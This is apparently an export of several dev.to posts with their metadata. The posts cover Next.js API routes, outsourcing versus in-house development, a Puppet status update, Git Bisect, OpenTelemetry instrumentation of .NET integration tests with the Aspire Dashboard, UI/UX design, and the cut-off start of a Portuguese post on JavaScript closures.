└── hello/
└── route.js
```
##Creating API routes
The API route file is usually named `route.js` or `route.ts` (for TypeScript users). This has to be in an `api` folder in the `app` folder. You can define **functions in the `route.js` files that handle different HTTP methods** (such as GET, POST, PUT, PATCH, etc.). For example, when you can make a `GET` request to `/api/hello` it would be handled by a `GET` function in `app/api/hello/route.js`.
### Request methods and API route functions
The standard convention is that within the `route.js` or `route.ts` file, you name an exported function with the **HTTP method you want it to handle in your API endpoint in uppercase**. The functions usually look like this:
```
// app/api/users/route.js
export async function GET(request) {
// Simulate a database call to fetch users
const users = [
{ id: 1, name: 'John Doe' },
{ id: 2, name: 'Jane Doe' },
];
// Return the users as a JSON response
return NextResponse.json(users);
}
```
### NextResponse and Request
The `NextResponse` is a **helper class** that extends the [web Response API](https://developer.mozilla.org/en-US/docs/Web/API/Response) with **additional convenience methods**, which are used to create responses. You can use it to rewrite, redirect, set headers, or create and send JSON responses.
---
The `Request`: When you define functions by using HTTP methods in creating your API endpoints, **the functions receive a `Request` object as an argument** which contains information about the incoming request. The object uses the [web Request API](https://developer.mozilla.org/en-US/docs/Web/API/Request). You can use it to read the request query parameters, **read the request body**, or access the request headers.
##Dynamic routes
By using **square brackets**, when naming your folders before the `route.ts` or `route.js` file, you can create a dynamic route for your API.
```
app/
└── api/
└── users/
└── [userId]/
└── route.ts
```
### Accessing a dynamic route
The dynamic route parameters can be accessed from the **route handler function's second argument**, which has the `params` object.
Take a look at this example:
```
// app/api/users/[userId]/route.ts
export async function GET(request: Request, { params }: { params: { userId: string }}) {
const {userId} = params
// Simulate a database call to fetch users
const users = [
{ id: 1, name: 'John Doe' },
{ id: 2, name: 'Jane Doe' },
];
//filter user by id
const user = users.filter((user) => user.id == userId)
// Return the users as a JSON response
return NextResponse.json(user);
}
```
I hope that wasn't complicated, and you got something out of this.
You can hear more from me on:
[Twitter (X)](https://x.com/code_withjoseph) | [Instagram](https://www.instagram.com/codewithjosephwebdev) | joeskills |
1,879,740 | Software Outsourcing vs. In-House Development: Pros and Cons | The world is modernizing day by day and it is rapidly changing according to the world of technology.... | 0 | 2024-06-07T00:09:20 | https://dev.to/liong/software-outsourcing-vs-in-house-development-pros-and-cons-2261 | development, outsourcing, malaysia, kualalumpur | The world is modernizing day by day and it is rapidly changing according to the world of technology. Most of the time nowadays, businesses are facing a very difficult question of whether they need to get started with software outsourcing or to in-house their work to outside external vendors. This is a point of getting the idea of both different kinds of software [in-house vs outsourcing development](https://ithubtechnologies.com/top-developer-in-malaysia/?utm_source=dev.to&utm_campaign=inhousevsoutsourcedevelopment&utm_id=Offpageseo+2024) as each of the software development has its own set of advantages and disadvantages.
This shows us how both of these are impacting in positive and negative aspects as it can impact our success of a business project. Here in this blog, you are going to get a basic idea about the pros and cons of software development. It is very important to know if you want to make a correct final decision that matches the company's aims and goals.
## In-House Development
## Pros:
1. **Full Control Over the Development Process:**
The in-house development plays an important role in providing us with the full control system. This means that it works best in offering us complete control over the whole development cycle. The software development cycle includes the starting planning, then the design to which you have to code, and gives us a team on the onsite area that makes sure that the project matches accurately and perfectly with the company's visions.
2. **Smooth Communication and Collaboration:**
Here it includes that when you have physical closeness, this will help you to have much better and smoother communication and easy collaboration. This will further cause more smooth and quick decision-making and problem-solving. This kind of closeness will help you to get the idea that your whole team is on the same page together.
3. **Understanding of company requirements:**
In-house software development has proven to be more likely involved in getting a much deeper understanding and knowledge of the company's main needs, requirements, preferences, culture, and business process. All these main points will help the company make a product that matches their needs and requirements.
4. **Easier to Apply Changes:**
When you are using in-house software development, this makes it much easier and smoother for it to apply changes and make adjustments more quickly. The in-house team is more quickly able to adapt themselves to new requirements or feedback. This will make sure that software is involved in the business together.
5. **Security of Property:**
When you are keeping everything in-house software development, this will make sure to reduce the problems or risk of intellectual property (IP) leakage. The company can have fully controlled ownership and even property information.
## Cons:
1. **Expensive Costs:**
The most important and major problem faced by in-house development is their expensive cots. in this, hiring, training, or getting the best expert developers can be quite expensive for a normal person. even if there are more costs or charges like office space, equipment, or employee benefits.
2. **Limited Skill Set:**
When we talk about the in-house software development skill set, it can be stated that they are very limited in number. The limited skillset is present as compared to the expert outsourcing firms. Overall, all this can be a risk factor or problem when you are handling a project that needs niche expertise and a very wide variety of technical skills.
3. **Resource Limitations:**
There is a problem of resource limitations that arise in the in-house development because when the company is running so many projects at one time. However, this can automatically cause delays or overworked staff members and also it impacts the unique quality of the output of the project.
4. **Longer Time:**
In this, we are going to talk about the presence of the longer time it takes to market. This can be explained when building or managing the in-house team members, and can be time-consuming. In addition, the recruitment process, team management, and development take a lot of time. This can automatically delay the initial starting part of the project and extend the time to take in the marketing.
## Software Outsourcing
## Pros:
1. **Price Efficiency:**
Software outsourcing is very cost-effective when we are working with other dealers from foreign different countries as they have the lowest labor costs. In this way, the companies can save on salaries, get more benefits, and maintain infrastructure expenses.
2. **Key to Global Talent Pool:**
Outsourcing development has provided us with the key to a global talent pool in which we can get easy access to the best skills and expertise. This automatically allows many companies to get specific knowledge and modern technology that may not be available in in-house software development.
3. **Flexibility:**
Outsourcing has provided greater flexibility because now companies can easily raise up or down their teams according to the project requirements without making any long-term commitment to getting full-time staff.
4. **Faster Time to Market:**
Outsourcing development has given us the best working processes and an experienced team which has made sure that we can market our project much faster in time. This will automatically give companies a competitive edge and faster time to market.
5. **Focus on Core Business Activities:**
Through outsourcing software development you are easily able to focus more on the major business activities. This will allow the internal team to focus on techniques for business growth rather than getting down with technical development.
## Cons:
1. **Communication Issues:**
The major drawback of outsourcing development is the communication system. this is explained by the idea that when you are working with an external team then many communication problems arise and also due to the team working from different time zones or they may speak a different language. This may cause misunderstandings and delays in the project.
2. **No control:**
In outsourcing, the difficult part is to control the development process as only less control is managed on the development process. This might cause problems for companies to manage projects smoothly and make sure dealers stick to his/her visions.
1. **Quality Issues:**
Quality issues arise if not all outsourcing firms deliver the best quality projects at the same level. Then this may lead to the risk of getting poor work but with more additional costs and time to spend.
4. **Security Concerns:**
When you are sharing sensitive information with outside dealers then it can pose security concerns and privacy issues.
5. **Cultural Differences:**
In outsourcing, you are working with outside dealers that are totally from different countries, cultures, languages, and different time zones. This may cause problems for you to work on the completion of the project together. This can affect working relationships and product quality.
## Conclusion:
According to the above-highlighted points, it can be concluded that both types of development have their advantages and disadvantages. Here the key is to focus on the pros and cons and then make proper final decisions.
| liong |
1,880,498 | Modules Status Update | Happy Friday Hope everyone had an awesome week stay tuned for latest updates and enjoy... | 0 | 2024-06-14T17:36:13 | https://puppetlabs.github.io/content-and-tooling-team/blog/updates/2024-06-07-modules-status-update/ | puppet, community | ---
title: Modules Status Update
published: true
date: 2024-06-07 00:00:00 UTC
tags: puppet,community
canonical_url: https://puppetlabs.github.io/content-and-tooling-team/blog/updates/2024-06-07-modules-status-update/
---
## Happy Friday
Hope everyone had an awesome week stay tuned for latest updates and enjoy your weekend…
| puppetdevx |
1,880,287 | Stop Wasting Hours! Git Bisect: Your Ultimate Bug Hunting Tool | Ever spent hours sifting through lines of code, desperately trying to pinpoint the source of a pesky... | 26,070 | 2024-06-07T11:23:51 | https://ionixjunior.dev/en/stop-wasting-hours-git-bisect-your-ultimate-bug-hunting-tool/ | git | ---
title: Stop Wasting Hours! Git Bisect: Your Ultimate Bug Hunting Tool
published: true
date: 2024-06-07 00:00:00 UTC
tags: git
canonical_url: https://ionixjunior.dev/en/stop-wasting-hours-git-bisect-your-ultimate-bug-hunting-tool/
cover_image: https://ionixjuniordevthumbnail.azurewebsites.net/api/Generate?title=Stop+Wasting+Hours%21+Git+Bisect%3A+Your+Ultimate+Bug+Hunting+Tool
series: mastering-git
---
Ever spent hours sifting through lines of code, desperately trying to pinpoint the source of a pesky bug? You're not alone. Debugging can feel like a frustrating maze, especially when you're dealing with complex projects and a history of numerous commits. But what if I told you there's a powerful tool that can help you track down the culprit commit in minutes, not hours? Enter Git Bisect, the secret weapon for efficient debugging. Let's learn about it now!
Imagine you’re working on a project with hundreds of commits, and suddenly, your code breaks. Instead of manually inspecting each commit, Git Bisect uses a clever binary search algorithm to quickly identify the exact commit that introduced the bug. This means you can say goodbye to endless hours of frustration and hello to faster debugging and quicker fixes. But how can it be possible?
Git Bisect is like a detective’s magnifying glass for your code. It helps you pinpoint the exact commit that introduced a bug, making debugging a breeze. Think of it as a binary search applied to your Git history. Don’t you know about binary search? You can find a lot of tutorials on internet, but I’ll try to explain here.
## How Binary Search Works
Imagine you have a sorted list of numbers, and you want to find a specific number within that list. Binary search works like this:
1. Start in the middle: Find the middle number in the list.
2. Compare: Is the number you’re looking for greater than or less than the middle number?
3. Cut in half: If your number is greater, discard the lower half of the list. If it’s less, discard the upper half.
4. Repeat: Now, you have a smaller list. Find the middle number in this new list and repeat steps 2 and 3.
5. Keep halving the list: You’ll keep cutting the list in half until you find the number you’re looking for.
### Requirements for Binary Search
- Sorted List: The list must be sorted (ascending or descending order) for binary search to work.
- Unique Elements: Ideally, the list should have unique elements, meaning no duplicates. This makes the search more efficient.
Now we know how the binary search works, let’s delve into the Git Bisect.
## How Git Bisect Works
Imagine our Git repository as a timeline, with each commit marking a step in our project’s history. Think of this timeline as our sorted list, with each commit like an entry, ordered chronologically. When we need to find the specific commit that introduced a bug into our code, we can use the same efficient logic of binary search to discover it.
To use Git Bisect, we need to guide it by identifying ‘good’ and ‘bad’ commits. Think of it like playing a game of ‘hot or cold’. We tell Git which commit is ‘good’ (where the code works) and which is ‘bad’ (where the bug exists). This is similar to the binary search where you have to tell if your number is greater or lesser than the middle one. Based on this information, Git Bisect can then efficiently narrow down the search space, like choosing the lower half or upper half of a list of commits, until it pinpoints the exact culprit commit.
And, believe me: it works like a charm! I like so much this command!
## Using Git Bisect in Practice
Now that we understand the concept of Git Bisect, let’s put it into action. Here’s a step-by-step guide to help you use Git Bisect in your own projects. Do you have a bug in your project? Try it!
### 1. Identify the “Good” Commit
Start by finding a commit that you know is working correctly (without the bug). This could be the last known working version, a specific release tag, or even a commit before you introduced the problematic feature. Remember, this commit should be before the point where the bug was introduced.
### 2. Identify the “Bad” Commit
Now, pinpoint the commit where the bug is present. This could be your latest commit, or any commit where you observe the bug. This commit should be after the point where the bug was introduced.
### 3. Initiate Git Bisect
Open your terminal and navigate to your Git repository. Run the following command:
```
git bisect start
```
### 4. Tell Git Bisect About “Good” and “Bad” Commits
Run these commands to mark your “good” and “bad” commits:
```
git bisect good commit-hash-of-good-commit
git bisect bad commit-hash-of-bad-commit
```
Replace `commit-hash-of-good-commit` and `commit-hash-of-bad-commit` with the actual commit hashes you identified in steps 1 and 2.
### 5. Git Bisect’s Suggestions
Git Bisect will now choose a commit somewhere between your “good” and “bad” commits. It will ask you to test this commit and tell it if the bug is present or not. Run your tests or manually check if the bug exists.
### 6. Provide Feedback
If the bug is present in the suggested commit, run:
```
git bisect bad
```
If the bug is not present in the suggested commit, run:
```
git bisect good
```
Git Bisect will then choose another commit based on your feedback and repeat the process.
### 7. Finding the Culprit
Git Bisect will continue this process of narrowing down the search space until it finds the commit that introduced the bug. It will display a message like “bisect: commit is first bad commit” to indicate the culprit commit.
### 8. Leaving Git Bisect
You can use `git bisect reset` to return to your original branch and review the code for the problematic commit.
### 9. Fixing the Bug
You can now fix the bug analyzing the culprit commit and test your changes. I like so much this approach, because you don’t need to look a lot of code and changes. Using Git Bisect you’ll find the specific commit that introduces the bug. This is smarter because the chance you solve the root of the problem increases.
Another interesting option using Git Bisect is to automate the test run. You can create a script and use it to run in every commit that Git checkout. This way you can automate and don’t need to make manual tests to do this. This is a way to use the Git Bisect “Like a Pro”, but I won’t talk about it in this post. If you want to know about it, tell me in the comments.
## Embrace Git Bisect for Faster Debugging
In this post, we’ve explored the power of Git Bisect, a powerful tool for tracking down pesky bugs in your codebase. We learned that Git Bisect utilizes a binary search algorithm to efficiently narrow down the search space of commits, quickly identifying the one that introduced the bug.
By understanding how Git Bisect works, you can significantly streamline your debugging workflow. Git Bisect not only saves you time and frustration but also helps you develop a deeper understanding of your codebase and its evolution. Also, I believe it’s a safer way to fix things, because you’re focused on the root of the problem, not on side effects.
So, the next time you encounter a stubborn bug, don’t hesitate to reach for Git Bisect. Embrace the power of this efficient tool to quickly identify the problem and get back to building amazing software. Try using Git Bisect in your next debugging session. Share your experiences and insights in the comments below. Let’s make debugging a more efficient and enjoyable process for all developers!
Remember, mastering Git Bisect is an investment that will pay off for years to come. So, go forth and debug with confidence!
Happy coding! | ionixjunior |
1,880,745 | Automated Tests instrumentation via OpenTelemetry and Aspire Dashboard | TL;DR In this post, we’ll look at how you can use OpenTelemetry to monitor your automated... | 0 | 2024-06-10T07:51:47 | https://nikiforovall.github.io/dotnet/opentelemtry/2024/06/07/test-instrumentation-with-otel-aspire.html | dotnet, aspnetcore, aspire, tests | ---
title: Automated Tests instrumentation via OpenTelemetry and Aspire Dashboard
published: true
date: 2024-06-07 00:00:00 UTC
tags: dotnet,aspnetcore,aspire,tests
canonical_url: https://nikiforovall.github.io/dotnet/opentelemtry/2024/06/07/test-instrumentation-with-otel-aspire.html
cover_image: https://nikiforovall.github.io/assets/test-instrumentation/blog-cover.png
---
## TL;DR
In this post, we’ll look at how you can use [OpenTelemetry](https://opentelemetry.io/docs/languages/net/instrumentation/) to monitor your automated tests and send that data to the Aspire Dashboard for visualization. The benefit of this approach is that you gain better insights into how your code works.
**Source code** : [https://github.com/NikiforovAll/tests-instrumentation-with-otel-and-aspire](https://github.com/NikiforovAll/tests-instrumentation-with-otel-and-aspire)
<center>
<img src="https://nikiforovall.github.io/assets/test-instrumentation/blog-cover.png" style="margin: 15px;">
</center>
- [TL;DR](#tldr)
- [Introduction](#introduction)
- [Running Integration Tests](#running-integration-tests)
- [Code Explained](#code-explained)
- [Instrumenting Tests](#instrumenting-tests)
- [Conclusion](#conclusion)
- [References](#references)
## Introduction
In this post, we’ll look at how you can use [OpenTelemetry](https://opentelemetry.io/docs/languages/net/instrumentation/) to monitor your automated tests and send that data to the Aspire Dashboard for visualization. The benefit of this approach is that you gain better insights into how your code works.
We are going to write integration tests for TodoApi application that can be defined as following:
```csharp
var builder = WebApplication.CreateBuilder(args);
builder.AddServiceDefaults();
builder.Services.AddHostedService<DbInitializer>();
builder.AddNpgsqlDbContext<TodoDbContext>("db");
builder.Services.AddEndpointsApiExplorer();
builder.Services.AddSwaggerGen();
var app = builder.Build();
if (app.Environment.IsDevelopment())
{
app.UseSwagger();
app.UseSwaggerUI();
}
app.MapDefaultEndpoints();
app.MapTodos();
await app.RunAsync();
```
Here is the API surface:
```csharp
public static RouteGroupBuilder MapTodos(this IEndpointRouteBuilder routes)
{
var group = routes.MapGroup("/todos");
group.WithTags("Todos");
group.WithParameterValidation(typeof(TodoItemViewModel));
group
.MapGet("/", GetTodoItems)
.WithOpenApi();
group
.MapGet("/{id}", GetTodoItem)
.WithOpenApi();
group
.MapPost("/", CreateTodoItem)
.WithOpenApi();
group
.MapPut("/{id}", UpdateTodoItem)
.WithOpenApi();
group
.MapDelete("/{id}", DeleteTodoItem)
.WithOpenApi();
return group;
}
```
It’s a very basic CRUD application, please feel free to investigate the details in the source code.
## Running Integration Tests
The tests are written based on the following technologies:
- `XUnit` - test framework
- `Testcontainers` - test dependencies management via Docker Engine and [.NET integration](https://dotnet.testcontainers.org/).
- `Alba` - author integration tests against ASP.NET Core HTTP endpoints. Alba scenarios actually exercise the full ASP.NET Core application by running HTTP requests through your ASP.NET system in memory using the built in [ASP.NET Core TestServer](https://learn.microsoft.com/en-us/aspnet/core/test/integration-tests).
I will explain how to instrument integration tests later. Right now, let’s see how it works.
```bash
dotnet test --filter TodosTests --verbosity normal
# Starting test execution, please wait...
# A total of 1 test files matched the specified pattern.
# [xUnit.net 00:00:00.00] xUnit.net VSTest Adapter v2.8.1+ce9211e970 (64-bit .NET 8.0.6)
# [xUnit.net 00:00:00.17] Discovering: Api.IntegrationTests
# [xUnit.net 00:00:00.24] Discovered: Api.IntegrationTests
# [xUnit.net 00:00:00.24] Starting: Api.IntegrationTests
# [xUnit.net 00:00:07.51] Finished: Api.IntegrationTests
# Test Run Successful.
# Total tests: 6
# Passed: 6
# Total time: 8.3519 Seconds
```
Here are output traces that can be found in Aspire Dashboard:
<center>
<img src="https://nikiforovall.github.io/assets/test-instrumentation/overview.png" style="margin: 15px;">
</center>
Open: [http://localhost:18888/](http://localhost:18888/) to see the results of Test Runs.
The interesting part here is a “Warmup” and “TestRun” traces. “Warmup” traces shows us how much time it took to setup host `TestServer` for _TodoApi_, _PostgreSQL_ container, and _Aspire Dashboard_ as reusable container.
<center>
<img src="https://nikiforovall.github.io/assets/test-instrumentation/warmup.png" style="margin: 15px;">
</center>
As you can see, we have a lot of thing going on during automatic database migration.
Let’s open “TestRun” traces. I’ve prepared two ways you can run integration tests. By default, `XUnit` runs tests within the same `TestCollection` sequentially, but we can override this behavior by using a custom test framework.
Here is sequential version:
<center>
<img src="https://nikiforovall.github.io/assets/test-instrumentation/seq-test-run.png" style="margin: 15px;">
</center>
And here is parallel version:
<center>
<img src="https://nikiforovall.github.io/assets/test-instrumentation/par-test-run.png" style="margin: 15px;">
</center>
💡Every test run is separated based on `service.instance.id` with value assigned to `test.run_id` custom attribute. It is assigned to every trace to make test runs discoverable. `test.run_id` is generated as sequential guid to order the test runs in time. Basically, you can use Aspire Dashboard drop down for replica set to inspect every test run.
<center>
<img src="https://nikiforovall.github.io/assets/test-instrumentation/replica-set.png" style="margin: 15px;">
</center>
## Code Explained
As mentioned previously, I use `Alba` to setup `TestServer` host.
In the code below, we are setting up reusable `WebAppFixture`. It will contain everything we need to test and interact with `TestSever`.
The other thing here we need to mention about is that we start `Activity` named “TestRun” to group sub-Activities for a test run.
```csharp
public class WebAppFixture : IAsyncLifetime
{
public static ActivitySource ActivitySource { get; } = new(TracerName);
private const string TracerName = "tests";
public IAlbaHost AlbaHost { get; private set; } = default!;
public static Activity ActivityForTestRun { get; private set; } = default!;
private readonly IContainer aspireDashboard = new ContainerBuilder()
.WithImage("mcr.microsoft.com/dotnet/aspire-dashboard:8.0.0")
.WithPortBinding(18888, 18888)
.WithPortBinding(18889, true)
.WithEnvironment("DOTNET_DASHBOARD_UNSECURED_ALLOW_ANONYMOUS", "true")
.WithWaitStrategy(
Wait.ForUnixContainer().UntilHttpRequestIsSucceeded(r => r.ForPort(18888))
)
.WithReuse(true)
.WithLabel("aspire-dashboard", "aspire-dashboard-reuse-id")
.Build();
private readonly PostgreSqlContainer db = new PostgreSqlBuilder()
.WithImage("postgres:16")
.Build();
public async Task InitializeAsync()
{
await this.BootstrapAsync();
ActivityForTestRun = ActivitySource.StartActivity("TestRun")!;
}
private async Task BootstrapAsync()
{
using var warmupTracerProvider = Sdk.CreateTracerProviderBuilder()
.AddSource(TracerName)
.Build();
using var activityForWarmup = ActivitySource.StartActivity("Warmup")!;
await this.aspireDashboard.StartAsync();
activityForWarmup?.AddEvent(new ActivityEvent("AspireDashboard Started."));
await this.db.StartAsync();
activityForWarmup?.AddEvent(new ActivityEvent("PostgresSql Started."));
var otelExporterEndpoint =
$"http://localhost:{this.aspireDashboard.GetMappedPublicPort(18889)}";
using var hostActivity = ActivitySource.StartActivity("Start Host")!;
this.AlbaHost = await Alba.AlbaHost.For<Program>(builder =>
{
builder.UseEnvironment("Test");
builder.UseSetting("OTEL_EXPORTER_OTLP_ENDPOINT", otelExporterEndpoint);
builder.UseSetting("OTEL_TRACES_SAMPLER", "always_on");
builder.UseSetting("OTEL_EXPORTER_OTLP_PROTOCOL", "grpc");
builder.UseSetting("OTEL_DOTNET_EXPERIMENTAL_OTLP_RETRY", "in_memory");
builder.UseSetting("OTEL_SERVICE_NAME", "test-host");
builder.UseSetting(
"Aspire:Npgsql:EntityFrameworkCore:PostgreSQL:ConnectionString",
this.db.GetConnectionString()
);
// ordered guid to sort test runs
var testRunId = NewId.Next().ToString();
builder.ConfigureServices(services =>
{
services
.AddOpenTelemetry()
.WithTracing(tracing =>
tracing
.SetResourceBuilder(
ResourceBuilder
.CreateDefault()
.AddService(TracerName, serviceInstanceId: testRunId)
)
.AddSource(TracerName)
.AddProcessor(new TestRunSpanProcessor(testRunId))
);
services.AddDbContextFactory<TodoDbContext>();
});
});
await this.AlbaHost.StartAsync();
activityForWarmup?.AddEvent(new ActivityEvent("Host Started."));
// wait for migration
await this
.AlbaHost.Services.GetServices<IHostedService>()
.FirstOrDefault(h => h.GetType() == typeof(DbInitializer))
.As<DbInitializer>()
.StartupTask;
}
public async Task DisposeAsync()
{
ActivityForTestRun?.Stop();
await this.AlbaHost.DisposeAsync();
await this.db.StopAsync();
}
}
```
We can define a collection of tests that will reuse same instance of `WebAppFixture` via `Xunit.CollectionAttribute` like this:
```
[CollectionDefinition(nameof(WebAppCollection))]
public sealed class WebAppCollection : ICollectionFixture<WebAppFixture>;
[Collection(nameof(WebAppCollection))]
public abstract class WebAppContext(WebAppFixture fixture)
{
public IAlbaHost Host { get; } = fixture.AlbaHost;
}
```
Now, we can use it by inheriting from `WebAppContext`:
```csharp
[TracePerTestRun]
public class TodosTests(WebAppFixture fixture) : WebAppContext(fixture)
{
private static readonly Func<
FluentAssertions.Equivalency.EquivalencyAssertionOptions<TodoItem>,
FluentAssertions.Equivalency.EquivalencyAssertionOptions<TodoItem>
> ExcludingTodoItemFields = cfg => cfg.Excluding(p => p.Id);
[Theory, AutoData]
public async Task GetTodos_SomeTodosExist_Ok(string todoItemTitle)
{
TodoItem item = new() { Title = todoItemTitle };
await this.AddTodo(item);
var result = await this.Host.GetAsJson<TodoItemViewModel[]>("/todos");
result.Should().NotBeNull();
result.Should().ContainEquivalentOf(item, ExcludingTodoItemFields);
}
[Fact]
public async Task PostTodos_ValidTodo_Ok()
{
var item = new TodoItem { Title = "I want to do this thing tomorrow" };
var result = await this.AddTodo(item);
result.Should().NotBeNull();
result!.IsComplete.Should().BeFalse();
}
[Theory, AutoData]
public async Task GetTodo_ExistingTodo_Ok(TodoItem item)
{
var dbTodo = await this.AddTodo(item);
var result = await this.Host.GetAsJson<TodoItemViewModel>($"/todos/{dbTodo.Id}");
result.Should().NotBeNull();
result.Should().BeEquivalentTo(item, ExcludingTodoItemFields);
}
[Theory, AutoData]
public async Task DeleteTodo_ExistingTodo_Ok(TodoItem item)
{
var dbTodo = await this.AddTodo(item);
await this.Host.Scenario(_ =>
{
_.Delete.Url($"/todos/{dbTodo.Id}");
_.StatusCodeShouldBeOk();
});
}
}
```
### Instrumenting Tests
You might mention special attributed called `TracePerTestRun`. It is responsible for OpenTelemetry test instrumentation.
`XUnit` provides `BeforeAfterTestAttribute` to hookup to test execution lifecycle. We use it to start sub-Activities under parent “TestRun” activity.
```csharp
public abstract class BaseTraceTestAttribute : BeforeAfterTestAttribute { }
[AttributeUsage(
AttributeTargets.Class | AttributeTargets.Method,
AllowMultiple = false,
Inherited = true
)]
public sealed class TracePerTestRunAttribute : BaseTraceTestAttribute
{
private Activity? activityForThisTest;
public override void Before(MethodInfo methodUnderTest)
{
ArgumentNullException.ThrowIfNull(methodUnderTest);
this.activityForThisTest = WebAppFixture.ActivitySource.StartActivity(
methodUnderTest.Name,
ActivityKind.Internal,
WebAppFixture.ActivityForTestRun.Context
);
base.Before(methodUnderTest);
}
public override void After(MethodInfo methodUnderTest)
{
this.activityForThisTest?.Stop();
base.After(methodUnderTest);
}
}
```
Also, for our convenience and to group tests together, we want to add `TestRunSpanProcessor`. It enriches every span with `test.run_id` tag/attribute. It is an extension point provided by .NET OpenTelemetry instrumentation library.
```csharp
public class TestRunSpanProcessor(string testRunId) : BaseProcessor<Activity>
{
private readonly string testRunId = testRunId;
public override void OnStart(Activity data) => data?.SetTag("test.run_id", this.testRunId);
}
```
🙌 Hooray, now you know how to instrument automated tests with _OpenTelemetry_ and visualize the test runs via _Aspire Dashboard_
💡See [https://www.honeycomb.io/blog/monitoring-unit-tests-opentelemetry](https://www.honeycomb.io/blog/monitoring-unit-tests-opentelemetry) for more details on how to instrument unit tests with _OpenTelemetry_. This blog post originally inspired me to write this blog post.
## Conclusion
In this post, we’ve explored how to use OpenTelemetry to instrument our automated tests and visualize the data on the Aspire Dashboard. This approach provides valuable insights into how our code operates, helping us to identify potential bottlenecks and improve the overall performance and reliability of our applications.
We’ve seen how to set up integration tests for a basic CRUD application using `XUnit`, `Testcontainers`, and `Alba`. We’ve also learned how to run these tests both sequentially and in parallel, and how to view the results in the Aspire Dashboard.
By instrumenting our tests with OpenTelemetry, we can gain a deeper understanding of our code and its behavior under test conditions. This can lead to more robust, reliable, and efficient applications.
Remember, the source code for this post is available on GitHub at [https://github.com/NikiforovAll/tests-instrumentation-with-otel-and-aspire](https://github.com/NikiforovAll/tests-instrumentation-with-otel-and-aspire). Feel free to explore it further and use it as a starting point for your own test instrumentation.
Happy testing! 🚀
## References
- [https://opentelemetry.io/docs/languages/net/instrumentation/](https://opentelemetry.io/docs/languages/net/instrumentation/)
- [https://dotnet.testcontainers.org/](https://dotnet.testcontainers.org/)
- [https://jasperfx.github.io/alba/guide/gettingstarted.html](https://jasperfx.github.io/alba/guide/gettingstarted.html)
- [https://www.honeycomb.io/blog/monitoring-unit-tests-opentelemetry](https://www.honeycomb.io/blog/monitoring-unit-tests-opentelemetry)
- [https://github.com/testcontainers/testcontainers-dotnet](https://github.com/testcontainers/testcontainers-dotnet) | nikiforovall |
1,879,738 | Importance of UI/UX in web design: enhancing user experience and driving success | When we talk about today's digital world, attention spans are getting shorter. Millions or billions... | 0 | 2024-06-06T23:57:49 | https://dev.to/liong/importance-of-uiux-in-web-design-enhancing-user-experience-and-driving-success-c72 | website, uiux, malyasia, kualalumpur | When we talk about today's digital world, attention spans are getting shorter. Millions or billions of tabs or websites are dying for your one click and websites need something like a secret recipe to get attention even from shorter spans. The secret recipe that websites need in their [website development](https://ithubtechnologies.com/website-development-malaysia/?utm_source=dev.to&utm_campaign=websitedevelopment&utm_id=Offpageseo+2024) is excellent UI/UX design. But the question that comes to your mind is what is UI/UX design and why it is very important for the success of our website.
## What is UI?
The UI is also known as the "User Interface" which is the element through which the user or any individual interacts. The seeing or visual elements are the buttons, menus, layouts, and overall look.
## What is UX?
The UX is also known as the "User Experience". This refers to the focus on the whole journey of a user or person that takes on your website.
## UI/UX Design:
First imagine that the UI/UX design is like a UI here designing a restaurant in which you give a decent look, services, seating arrangements, and a clear menu system. Imagine UI/UX as a well-designed restaurant. The UX here is the friendly comfortable services and the smooth wait staff, the overall feeling of satisfaction after leaving a restaurant. The best kind of UI/UX design is all about creating a design that comforts or satisfies the user in such a way that he/she gets an amazing experience of it and comes back again and again to the website for more stuff to see.
## Let's explore why UI/UX design is the magical touch your website needs:
## 1. First Impressions is the last impression: The Power of Attractive UI
There is a point when you think that your website is your digital storefront. It depends upon the website whether to discourage the customers or viewers and to encourage the customers from entering the website. So a website with a confusing and outdated UI design means that this will automatically drive away your customers. Here at this point, the UI design comes in. An amazing UI design is all about a clear picture, constant branding, and top high-quality visuals which will automatically get attention and create a positive first impression.
**Imagine this:** As an example, you can see that you land a website for your earnings brand. The homepage of the website plays an important role in acting as a feast for the customers and showcasing your very own elegant products. The location bar is very clear and easy to find, allowing you to browse different collections more easily. This is considered to be the power of UI design that makes a sense of trustworthiness and professionalism,
You land on a website selling handmade jewelry. The homepage is a feast for the eyes, showcasing beautiful product photos against a clean, elegant background. The navigation bar is clear and easy to find, allowing you to effortlessly browse different collections. This is the power of good UI – it creates a sense of trust and professionalism, making you more likely to explore further.
## 2. User-Friendly Navigation: The Key to Keeping Visitors Engaged
The website's main purpose is to be visually amazing with its appearance to make sure that it attracts more customers. But if the users are not able to find anything for whatever they're looking for then it's useless. At this point, you get the idea that UX works best. UX's main thing is to create a website that is easy to use and locate and everything. It's all about clear menus, major information, and search functions, these are all very important.
**Think about it:** Suppose that you are looking for a blog post on a new channel website. The homepage shows so many ads and then the location menu is buried under an irrelevant bundle of texts. This is an example of a bad type of UX. The best kind of UX is all about the users applying the least effort to find anything and it fills the requirements and needs of the user.
## 3. Building Trust: The Value of Consistency
Let's just think that you are walking into a restaurant and there you find a mismatched arrangement of seats and the staff is not wearing a proper uniform to represent their restaurant. this would not make a good first impression on the customers too. My point is that you need to think the same way for websites too, that a consistent UI/UX design builds up trust.
**Here's why:** The reason for this is to give you an idea that websites with a consistent design language like using fonts, colors, and layout throughout the making of a website give a feeling of showing professionalism and a unique branding of your brand. This will make the user recognize your brand more easily and build up their trust in your website more.
## 4. Increased Conversions: Turning Visitors into Customers
Additionally, when our website is done with the design. Here at this point our Website's main goal appears to convert visitors into loyal customers or attract more engagement. Here the importance of UI/UX comes in and works in the best way. Websites mostly consist of clear and relevant CTAs also known as calls to Action. These buttons mentioned on the website will make sure that more users come to your website and have better conversations.
**For example:** This can be shown by the example that when your e-commerce website has a unique checkout process, placing of "Add To Cart" button option and clear product description mentioned on the site can hopefully turn the visitors into buyers. A good UI/UX design not only engages the customers but also guides them to take action.
## Conclusion: Happy Users, The Power of User Satisfaction
According to the points stated above it can be concluded that the best UI/UX design is truly very powerful if it's done more accurately and correctly.
| liong |
1,433,859 | Desvendando Closure Javascript | Olá pessoas, bora falar um pouco sobre Closure Javascript, o que são? Do que se alimentam? E como... | 0 | 2023-04-12T16:09:23 | https://dev.to/taisesoares/desvendando-closure-javascript-26nn | javascript |

Olá pessoas, bora falar um pouco sobre Closure Javascript, o que são? Do que se alimentam? E como usá-las? 🤔
Se você já ouviu falar, mas nunca entendeu direito o que é, ou se você é novo no mundo do JavaScript, bora mergulhar nesse tópico e aprender o que são closures, para que servem e como podemos tirar proveito deles em nossos projetos.
### Afinal, o que são?
São funções canibais que se alimentam de outras 🤪 ... Brincadeiras a parte, vamos a definição técnica disponível no MDN:
